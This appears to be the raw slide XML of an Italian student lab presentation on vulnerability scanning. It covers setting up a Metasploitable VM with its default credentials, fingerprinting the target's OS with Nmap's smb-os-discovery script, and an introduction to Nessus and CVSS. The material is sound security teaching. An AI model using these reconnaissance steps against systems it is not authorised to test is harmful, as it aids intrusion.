            <a:ext cx="15381560" cy="1659255"/>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2 - Vulnerability </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="6720"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Scanning</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Freeform 18" id="18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10424593" y="5437948"/>
            <a:ext cx="7433380" cy="3286000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="3286000" w="7433380">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7433380" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7433380" y="3286001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3286001"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 19" id="19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="12641595" y="1863712"/>
            <a:ext cx="4222733" cy="1412018"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1412018" w="4222733">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4222734" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4222734" y="1412018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1412018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 20" id="20"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1539740" y="829618"/>
            <a:ext cx="15208520"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1.2 - CONFIGURAZIONE METASPLOITABLE</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pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 22" id="22"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10206990" y="2198441"/>
            <a:ext cx="2088222" cy="2015134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 23" id="23"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="7198138">
            <a:off x="15538531" y="3140517"/>
            <a:ext cx="1986243" cy="1916725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 24" id="24"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="215797" y="1678505"/>
            <a:ext cx="6710356"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METASPLOITABLE</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TextBox 27" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="658966" y="2990323"/>
            <a:ext cx="9008090" cy="6477276"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Avviare la VM Metasploitable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Avviamo la macchina virtuale Metasploitable e quando richiesto accediamo con nome utente: “msfadmin” e password: “msfadmin”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Accedere al file di configurazione di rete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>sudo nano /etc/network/interfaces</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, quindi premete Invio. Questo comando aprirà il file che contiene la configurazione della rete.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Modificare l'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Nel file che si aprirà, individuiamo la riga che specifica l'attuale indirizzo IP. Modifichiamo questo indirizzo con quello richiesto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Salvare le modifiche</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Per salvare le modifiche apportate, premiamo i tasti </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Control + O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>, quindi premiamo Invio per confermare e Control+X per chiudere l’editor nano.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Riavviare l'interfaccia di rete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Per applicare le modifiche senza riavviare l'intera macchina, digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>sudo /etc/init.d/networking restart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> e premiamo Invio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" marL="402469" indent="-201235" lvl="1">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>Verificare la modifica dell'indirizzo IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>: Infine, per assicurarci che l'indirizzo IP sia stato modificato correttamente, digitiamo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Semi-Bold"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1864">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> nel terminale e premiamo Invio. Questo comando mostrerà la configurazione attuale della rete, incluso l’indirizzo IP assegnato.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2609"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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3114945"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3" id="3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="14975947" y="-25865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3"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 4" id="4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="11737262" y="5639435"/>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502904" y="-2882098"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr name="Group 6" id="6"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="true"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="-5400000">
            <a:off x="8988874" y="-487830"/>
            <a:ext cx="8274819" cy="11466662"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="4734560" cy="6560820"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 7" id="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8" id="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9" id="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194" r="0" b="-2194"/>
              </a:stretch>
            </a:blipFill>
          </p:spPr>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr name="Freeform 10" id="1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1" id="1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2" id="1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3" id="1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4" id="1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5" id="1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7" id="1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8" id="18"/>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TextBox 19" id="19"/>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Medium"/>
              </a:rPr>
              <a:t>2.1 - SCAN CON NMAP</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400030" y="1170397"/>
            <a:ext cx="6644060" cy="8150208"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="8150208" w="6644060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6644060" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6644060" y="8150208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="8150208"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 22" id="22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="-361954" y="6678823"/>
            <a:ext cx="7958478" cy="2836392"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="2836392" w="7958478">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7958478" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7958478" y="2836392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2836392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId6"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 23" id="23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="9390607" y="8237152"/>
            <a:ext cx="7284896" cy="328333"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="328333" w="7284896">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="7284896" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7284896" y="328333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="328333"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId7"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="Freeform 24" id="24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="508618">
            <a:off x="6215753" y="8444452"/>
            <a:ext cx="3707491" cy="1876917"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="1876917" w="3707491">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3707490" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3707490" y="1876917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1876917"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId8"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>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7" id="27"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="8069498" y="1604792"/>
            <a:ext cx="9189802" cy="7205938"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Abbiamo effettuato una scansione con il toll nmap </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>del target in esame con una feature a disposizione dell’utente: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>NSE ( Nmap Scripting Engine)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Nmap Scripting Engine permette all’utente di eseguire piccoli script per automatizzare dei task di rete, come per esempio la risoluzione dell’enumerazione di DNS, attacchi brute force, host discovery e tanti altri.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Gli script NSE sono nella cartella </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>/usr/share/nmap/scripts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Per eseguire uno script con NSE si può utilizzare lo switch --script seguito dal nome dello script in esame.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>In questo caso abbiamo utilizzato uno degli script presenti smb-os-discovery, che prova a determinare la versione del sistema operativo di un sistema target dal banner del servizio SMB (il servizio SMB è utilizzato per l’accesso a risorse condivise su una rete, come stampanti, file ecc...)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2051">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Nel nostro caso abbiamo utilizzato il seguente comando specificando l’IP del target:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2732"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPts val="2872"/>
              </a:lnSpc>
            </a:pPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition spd="fast">
    <p:cover dir="l"/>
  </p:transition>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319193" y="1028700"/>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1288184" y="3028319"/>
            <a:ext cx="5750608" cy="5750608"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect r="r" b="b" t="t" l="l"/>
            <a:pathLst>
              <a:path h="5750608" w="5750608">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5750607" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5750607" y="5750608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5750608"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect l="0" t="0" r="0" b="0"/>
            </a:stretch>
          </a:blipFill>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr name="Picture 21" id="21"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="true"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:srcRect l="0" t="0" r="0" b="0"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="false" flipV="false" rot="0">
            <a:off x="10231237" y="5771221"/>
            <a:ext cx="923597" cy="614192"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr name="TextBox 22" id="22"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1028700" y="1672594"/>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NESSUS</a:t>
            </a:r>
          </a:p>
        </p:txBody>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5" id="25"/>
          <p:cNvSpPr txBox="true"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="0">
            <a:off x="1161868" y="3034038"/>
            <a:ext cx="7750607" cy="5980802"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" rtlCol="false" tIns="0" lIns="0" bIns="0" rIns="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2285">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>Nessus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2285">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t> è uno strumento di scansione delle vulnerabilità utilizzato per identificare punti deboli e configurazioni errate nei sistemi informatici. Questo software esegue scansioni di sicurezza su reti, server, e dispositivi, rilevando vulnerabilità note grazie al confronto che esegue con database sempre aggiornati.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2285">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Per ogni vulnerabilità trovata fornisce documentazione di studio e possibili remediation action per sanarla o mitigarla. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2285">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1"/>
              </a:rPr>
              <a:t>Offre anche un comodo report con tutte le vulnerabilità ordinate per  critictà con il </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2285">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Open Sans 1 Bold"/>
              </a:rPr>
              <a:t>CVSS (Common Vulnerabilities Scoring System).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr">
              <a:lnSpc>
                <a:spcPts val="3199"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2285">
                <a:solidFill>
